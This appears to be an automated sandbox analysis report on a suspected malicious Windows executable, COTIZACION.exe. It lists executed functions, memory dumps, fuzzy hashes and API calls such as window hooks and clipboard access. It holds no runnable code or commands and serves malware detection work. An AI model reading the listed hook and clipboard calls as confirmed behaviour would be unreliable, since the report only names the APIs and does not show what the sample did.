String ID: C:\Users\user\Desktop
API String ID: 2709904686-2743851969
Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
Instruction ID: 8ca8e9e1e5128dac63b4d4f5950f4db4f9885d0bf84f26727eb387c0c5501f09
Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
Instruction Fuzzy Hash: 75D05E31015924DBD7626B18ED059AF77A8EF0130030A846EE983E3164CB385C9187BD

Analysis Process: COTIZACION.exePID: 7796, Parent PID: 7316COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	139
Total number of Limit Nodes:	13

Executed Functions

Function 0015A950 Relevance: 2.9, Instructions: 2856COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79a9435219f25ef6d97320548d933e6150b9066940f4c10a45706c89ae62d1e7
Instruction ID: 1a926e5b78b81b53104c0a46d05de9277223673442318e8207a9eb94b51cf71f
Opcode Fuzzy Hash: 79a9435219f25ef6d97320548d933e6150b9066940f4c10a45706c89ae62d1e7
Instruction Fuzzy Hash: 6563E931D10B1ACADB11EF68C8945A9F7B1FF99300F51D79AE4587B121EB70AAC4CB81

Function 3B235648 Relevance: 1.8, Strings: 1, Instructions: 591
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 3B235D54

Memory Dump Source

Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 63ff472ec0c5c373058af04ae0d2c2b55dbb1c06288ef43d5e6d41bf2a8734a6
Instruction ID: f507a8b31f8af8be656d0d171e4d63ceef43825190be0bb9a73dbde61a99ab48
Opcode Fuzzy Hash: 63ff472ec0c5c373058af04ae0d2c2b55dbb1c06288ef43d5e6d41bf2a8734a6
Instruction Fuzzy Hash: E722E6B5F012158FEB11CBA4C4D069EBBB2EF85720F24866AD40DAB385DB35DD42CB90

Function 00153E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\VZm, xrefs: 001540CB

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID: \VZm
API String ID: 0-3153696063
Opcode ID: a1eed1d347f0eacf5dd42328778ed76bb0a542f74206b45d9c1dc601c769fd6e
Instruction ID: 890c4eeef60c7b6c32e94b9b88039c90d04e444950a643818c31d83955cd1d4b
Opcode Fuzzy Hash: a1eed1d347f0eacf5dd42328778ed76bb0a542f74206b45d9c1dc601c769fd6e
Instruction Fuzzy Hash: 62919370E00609CFDF14CFA9C9957DDBBF1AF48305F148129E825AB294DB749989CB91

Function 3B232338 Relevance: 1.0, Instructions: 1037COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d2f5315a9387f577ffda7d72bf1d6550e1a06750346fdc68d6bb3e329f555d
Instruction ID: 0d9039a58839bbfefc9da91271dfe14a6505eb23a74140ada30074fa863581fc
Opcode Fuzzy Hash: d5d2f5315a9387f577ffda7d72bf1d6550e1a06750346fdc68d6bb3e329f555d
Instruction Fuzzy Hash: 5C922578E012058FEB14CB68C584B89BBF2FF49714F5586A9D409AB3A1DB35ED86CF40

Function 3B236698 Relevance: .8, Instructions: 824COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b624b085d517ee26f4faf7aa3823c248ac72ba6937dd39a2d8f106d77ffeb322
Instruction ID: 35833d321e13ffd429d728a76349399597a4a53b1e1f954c8d80abe2cf2783e0
Opcode Fuzzy Hash: b624b085d517ee26f4faf7aa3823c248ac72ba6937dd39a2d8f106d77ffeb322
Instruction Fuzzy Hash: AC62CE74B012058FEB45DBA8C594B9DBBF6EF89740F148669D40AEB390DB35EC42CB90

Function 3B23C220 Relevance: .6, Instructions: 640COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d21973baaa0c0f521af4df55461783e499030a64deaa0a271573d0c27db52965
Instruction ID: e4b3735528c678fbc0fed677d117610c87582bf8890e133ce2f843c263cf7ef2
Opcode Fuzzy Hash: d21973baaa0c0f521af4df55461783e499030a64deaa0a271573d0c27db52965
Instruction Fuzzy Hash: 233281B5B013058FEB04DB68D890B9DBBB6FB89750F108626D419EB395CB35EC42CB91

Function 0015D990 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 108afe956e0b5e5c0b4706ec2b01d9d10ee7843694a520204e328a638ab39504
Instruction ID: 6a628aae2d233eeb22d05860d5dd06ecdb369904b4b353c96bcb356728976f2c
Opcode Fuzzy Hash: 108afe956e0b5e5c0b4706ec2b01d9d10ee7843694a520204e328a638ab39504
Instruction Fuzzy Hash: 2A221571A04255CFDB25CB68D8807BEBBB2EF85311F1585AAD865DF282C734EC4AC790

Function 3B23B2C0 Relevance: .6, Instructions: 559COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8e68dde12672c283417e93e08c2579ad7b74bf6f13aec67b765fcbe3ec365b
Instruction ID: 5498bc15409745a90d39c7964872e92f614a2d687574e46bfdccec3bfdc938c9
Opcode Fuzzy Hash: 2a8e68dde12672c283417e93e08c2579ad7b74bf6f13aec67b765fcbe3ec365b
Instruction Fuzzy Hash: E01265B8E012098BEB14CF68D4D479DB7B2FB49750F608626F41DEB391DA34DD818B91

Function 3B233108 Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9eb83430f1f9edb46574d7aff0cb6ac552bd82b4711fe0664bf908e218d1b23
Instruction ID: 22949a023da99fa90c9260d1fe422bd9585ee046eee297d1cdba376d03e3a4dd
Opcode Fuzzy Hash: b9eb83430f1f9edb46574d7aff0cb6ac552bd82b4711fe0664bf908e218d1b23
Instruction Fuzzy Hash: ED326074E10759CFDB14DBB9C89099DB7B6BFC9300F50C66AD409BB250EB70AA85CB50

Function 00154A98 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c6efa356bf90fc96377c116949aa25868bf5a0691e721ba9a19e5d8a497860
Instruction ID: 2f30c26d9f721e32dbca0df2f623fac21942e7b20d06831e5b5fdda16ad32727
Opcode Fuzzy Hash: e8c6efa356bf90fc96377c116949aa25868bf5a0691e721ba9a19e5d8a497860
Instruction Fuzzy Hash: E7B16470E00209CFDF14CFA9D8917DDBBF2AF88719F148529D825EB254EB749885CB91

Function 3B715E79 Relevance: 6.1, APIs: 4, Instructions: 142
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3B715F06
GetCurrentThread.KERNEL32 ref: 3B715F43
GetCurrentProcess.KERNEL32 ref: 3B715F80
GetCurrentThreadId.KERNEL32 ref: 3B715FD9

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e51d6436388e4f9f19ed7adbb287e7c90a2490ed052af8a0fd00b27d674583a6
Instruction ID: 2c4cfe09ba854ad4cb5af3df82e5ec70a8d9dd4f6a42e0cf3774a512c310824a
Opcode Fuzzy Hash: e51d6436388e4f9f19ed7adbb287e7c90a2490ed052af8a0fd00b27d674583a6
Instruction Fuzzy Hash: 095189B09017498FDB04CFAAD548B9EBBF1EF49300F20845AE419AB3A1DB749A45CF65

Function 3B715E88 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3B715F06
GetCurrentThread.KERNEL32 ref: 3B715F43
GetCurrentProcess.KERNEL32 ref: 3B715F80
GetCurrentThreadId.KERNEL32 ref: 3B715FD9

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 593063d523e84d8bebd5b58ea0e8044b2c3a590c7e39c2535edfd2c1c68b9c49
Instruction ID: 676d12ef69299909d673a79984fb353e09ac42125a558d156d6b23561520a73a
Opcode Fuzzy Hash: 593063d523e84d8bebd5b58ea0e8044b2c3a590c7e39c2535edfd2c1c68b9c49
Instruction Fuzzy Hash: A85147B09017098FDB04CFAAD548B9EBBF5EF88310F20845AE419BB350DB749A45CF65

Function 00154810 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\VZm, xrefs: 001549D2
\VZm, xrefs: 0015487F

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID: \VZm$\VZm
API String ID: 0-2081764631
Opcode ID: 9aeb4f399d5244437d6a25c2f18b1a7409ffa1e891d512d510d301517a6ab427
Instruction ID: 39969e59cd6daf859cdb284e760cc378d6aff96557e1193195da754959714e92
Opcode Fuzzy Hash: 9aeb4f399d5244437d6a25c2f18b1a7409ffa1e891d512d510d301517a6ab427
Instruction Fuzzy Hash: 63718F70E00249CFDF14CFA9C8857DEBBF1BF88719F148129E825AB254DB749885CB95

Function 00154804 Relevance: 2.7, Strings: 2, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\VZm, xrefs: 001549D2
\VZm, xrefs: 0015487F

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID: \VZm$\VZm
API String ID: 0-2081764631
Opcode ID: e16305a6ba4906d8906ed291bbb20812f8c2817861d583e8be42f069247cde91
Instruction ID: 0a922cc965fcc97093afad548fa7dc6505f29159bad42d836eefab44bf62387e
Opcode Fuzzy Hash: e16305a6ba4906d8906ed291bbb20812f8c2817861d583e8be42f069247cde91
Instruction Fuzzy Hash: 13719D70E00249CFDF14CFA9C8857DEBBF1BF48719F148129E825AB254EB749885CB91

Function 0015ECC8 Relevance: 1.6, Strings: 1, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PJ,q, xrefs: 0015F079

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID: PJ,q
API String ID: 0-2306339500
Opcode ID: 15391cf41e9a07133504bcb6d2a6da54460ee6e12f9bebac04b829e221451bfa
Instruction ID: fcfde22638df5f184a9a2d55f8cf82f3be1054da256672d2fc32bdc12c459d92
Opcode Fuzzy Hash: 15391cf41e9a07133504bcb6d2a6da54460ee6e12f9bebac04b829e221451bfa
Instruction Fuzzy Hash: EAE15B34A00215CFDB28DB68C490AAE7BF2FB89305F244529E816EF395DB35DD4ACB51

Function 3B71236F Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B71248A

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a2bc7ab690c71050ef2be6d75b8ce4d8b8f82b8b90be225e64c47dda85642166
Instruction ID: dcf7a19889722c1d9848e48e1c00d3ed1da4fad3a3dc58dd003fa63dd201ac7c
Opcode Fuzzy Hash: a2bc7ab690c71050ef2be6d75b8ce4d8b8f82b8b90be225e64c47dda85642166
Instruction Fuzzy Hash: C151B0B5D103499FDB14CF99D880ADEBBB1FF48310F24852AE818BB210D7749845CF90

Function 3B712378 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B71248A

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 99f39ccb7f0afdc84536d5eb7b8dc9c72b1ddcd5810cfec044274086d87c9a9a
Instruction ID: 4e1421837c65bcf64736ad08c9c91467d8fd55667ffccf9983e5af70a8326782
Opcode Fuzzy Hash: 99f39ccb7f0afdc84536d5eb7b8dc9c72b1ddcd5810cfec044274086d87c9a9a
Instruction Fuzzy Hash: 3241A2B5D103099FDB14CF99D980ADEBBB5FF48310F24852AE819BB210D7749845CF90

Function 3B715CBC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 3B717029

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 9f40424d8d8c31409456ea950ff67254267ae001691732e3d6bb89ed0647db1f
Instruction ID: 0827303590b58a4381a709efd7e2e4c2605756606618eec21e5eba86df73c5c8
Opcode Fuzzy Hash: 9f40424d8d8c31409456ea950ff67254267ae001691732e3d6bb89ed0647db1f
Instruction Fuzzy Hash: 0E4149B9A00309CFDB10CF99C484AAABBF5FF88314F24C459E519AB321D775A941CFA1

Function 3B717CA4 Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 3B717D38

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 852cebdd24d80c5ed1e84cc204c36b31b852441f11d48744deed882a7c0c65e6
Instruction ID: a4e9676ae7e65cef7d27735061b513a548ef40509d65c236c73b48b08fa7c17e
Opcode Fuzzy Hash: 852cebdd24d80c5ed1e84cc204c36b31b852441f11d48744deed882a7c0c65e6
Instruction Fuzzy Hash: 9B31E1B4A0224DDFEB20CFA9C580BDDBBB1FF48314F208459E444AB294DB74A845CF61

Function 3B717250 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B717275), ref: 3B7172FF

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 518ffdc8714a14b9cae3ff28bf0b58dcdb39201741b6a9c5901f7b91ed455b7e
Instruction ID: 3f8e2a9e10e96730bf38afac7170744ea90c2145703b0fcc91951a59c791d5a8
Opcode Fuzzy Hash: 518ffdc8714a14b9cae3ff28bf0b58dcdb39201741b6a9c5901f7b91ed455b7e
Instruction Fuzzy Hash: F821A0B59043888FDB21CFA9D5817CEBFF4EF46310F14449AE449EB252C334A944CBA1

Function 3B717CB0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 3B717D38

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: f5e30d24d0c9adc12846cf3d9d6dbc891aacd43e7d51fab35db66e4acd496131
Instruction ID: 45ccd1dd8d54c46642f0614fbccc3c90d15169a5eb5b47ae6d878a869938024f
Opcode Fuzzy Hash: f5e30d24d0c9adc12846cf3d9d6dbc891aacd43e7d51fab35db66e4acd496131
Instruction Fuzzy Hash: B631EFB490220DDFEB10CF99C984BDEBBF5AF48314F208059E448AB290DB74A845CB65

Function 3B7160C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B716157

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c6b6c81eb57778146560d17b15a489eec0ddbf95a6a13e6b65401c75f897398b
Instruction ID: d7cc55db80ba1d7ecf3966c4afc3865a771727e370ea03d0d6e67ac6d12ac769
Opcode Fuzzy Hash: c6b6c81eb57778146560d17b15a489eec0ddbf95a6a13e6b65401c75f897398b
Instruction Fuzzy Hash: 7121E3B59002499FDB10CFAAD984ADEFFF4FB48310F14845AE958A7310D374A950CFA1

Function 3B7160D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B716157

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8b1c4f8d6bdd002dd695734749f13a13ebbb3caf877a7801e815e0c45daf7079
Instruction ID: 8c206877b1287cb4c6d1277e0ababe4970e6b147a3e601ff7d76317e1d0b39bf
Opcode Fuzzy Hash: 8b1c4f8d6bdd002dd695734749f13a13ebbb3caf877a7801e815e0c45daf7079
Instruction Fuzzy Hash: 3C21C4B59002499FDB10CFAAD984ADEFBF5EB48310F14841AE958A7350D374A950CFA5

Function 3B7197F0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B71986B

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 0b7f6e671050d540d1b70e2c401d28bd59e918b9cc26006d34638188a5ed8d9b
Instruction ID: 3e34d284278a8fd99bea79f77325429b107104049b8566b9cc6b6e77bfd63cfb
Opcode Fuzzy Hash: 0b7f6e671050d540d1b70e2c401d28bd59e918b9cc26006d34638188a5ed8d9b
Instruction Fuzzy Hash: A421EFB5D002099FDB14CFAAD944BAEBBF5EB88320F10842AE459A7250D774A945CFA1

Function 3B7197F2 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B71986B

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: f0e9bacf72fc946805f07b209bbd60e64673ee84f9fc46a5288ea5bc9515b595
Instruction ID: 379003b7b0177ad791c18100a40cb80f345f615ad6a6dd4ce71158a6a03a593f
Opcode Fuzzy Hash: f0e9bacf72fc946805f07b209bbd60e64673ee84f9fc46a5288ea5bc9515b595
Instruction Fuzzy Hash: 2C21E0B5D002099FDB14CFAAD944BEEBBF5FF88310F10842AE459A7250C774A945CFA1

Function 3B715E6C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 3B717BBD

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2c5a19836ae60da2fed380ecd6115c9be6ba4c95ff7a259fb1c04a2b73d74475
Instruction ID: 4acfefb508366d5838f945b6b7dd937d2e7914234d55dae5c1295e2156f44500
Opcode Fuzzy Hash: 2c5a19836ae60da2fed380ecd6115c9be6ba4c95ff7a259fb1c04a2b73d74475
Instruction Fuzzy Hash: 531115B5900349CFDB20DF9AD544BDEBBF4EB48320F108459E558A7700D374A940CFA5

Function 3B715D14 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B717275), ref: 3B7172FF

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 2327a97e17381a55af5f1ad68751664d6663a77bc360625b56ebc645336f5d85
Instruction ID: 13c7c65e7a7d391d47318056b1136d4485f65fda395121085f6e78b61c8c112e
Opcode Fuzzy Hash: 2327a97e17381a55af5f1ad68751664d6663a77bc360625b56ebc645336f5d85
Instruction Fuzzy Hash: 151133B59003488FDB10CF9AD444BDEBBF4EB48324F20841AE918A7240D378A940CFA5

Function 3B717298 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B717275), ref: 3B7172FF

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 671da6973f5acfe5393bb593dae3034cf4e4d2121a2a5a0025ef8bcf4996911b
Instruction ID: be98b35a55deb421fa9dd423aa174ed14492eafe2b0ebb01b67ca5887bee3b4a
Opcode Fuzzy Hash: 671da6973f5acfe5393bb593dae3034cf4e4d2121a2a5a0025ef8bcf4996911b
Instruction Fuzzy Hash: 201133B69003488FDB10DF9AD444BDEBBF4EF49320F20881AE558AB250C374A544CFA1

Function 3B717B67 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 3B717BBD

Memory Dump Source

Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 72540ab0f9e62d6ec26fd93acf71b084166e2babe398706a0c2bbe5b8f24fd8a
Instruction ID: 754bf13eb3269a0f7085bb151820189963b022ef402eb94eebb6af3829cfddf7
Opcode Fuzzy Hash: 72540ab0f9e62d6ec26fd93acf71b084166e2babe398706a0c2bbe5b8f24fd8a
Instruction Fuzzy Hash: C61112B5900349CFDB20CFAAE585BDEBBF4EB48320F20885AD458A7700C378A540CFA5

Function 0015A1DB Relevance: 1.5, Strings: 1, Instructions: 289COMMON

Download Yara Rule

Strings

], xrefs: 0015A174

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID: ]
API String ID: 0-3352871620
Opcode ID: 6da8e2dc323e2832df87e1d49a4d44ec825c99ef9b23d84cd64f704e7dfe05ef
Instruction ID: 939f0156070c690c5cd377ad1b5a81c065ce5d057e8ffdafee14333641ec42e9
Opcode Fuzzy Hash: 6da8e2dc323e2832df87e1d49a4d44ec825c99ef9b23d84cd64f704e7dfe05ef
Instruction Fuzzy Hash: E8B16F34A40204CFCB14DBA8C894AADBBF2FF89311F648569E816EB355DB71DC46CB51

Function 00153E74 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\VZm, xrefs: 001540CB

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID: \VZm
API String ID: 0-3153696063
Opcode ID: fb4aab27c73ea45edd1ef16f35ece412d56fd77e9428388825e0127062756456
Instruction ID: fcc65d5d91214252cec00cf7502ba0c84a98ab374c640f38b7af205b4d9783d2
Opcode Fuzzy Hash: fb4aab27c73ea45edd1ef16f35ece412d56fd77e9428388825e0127062756456
Instruction Fuzzy Hash: BFA18E70E00709CFDF10CFA8C9857DEBBF1AF48715F248129E825AB294DB749989CB91

Function 0015A073 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

HS08lS08, xrefs: 0015A0C5

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID: HS08lS08
API String ID: 0-4026685390
Opcode ID: 5f2fd80c57b9ff2b625abcf2cba9fb2d358b7a0fda9a3082eb87b7c8a9507a45
Instruction ID: 94955ffc50767f7392cbe781d193cf8f880d4747e8aa7ff2b6022c8dc3eb7ac0
Opcode Fuzzy Hash: 5f2fd80c57b9ff2b625abcf2cba9fb2d358b7a0fda9a3082eb87b7c8a9507a45
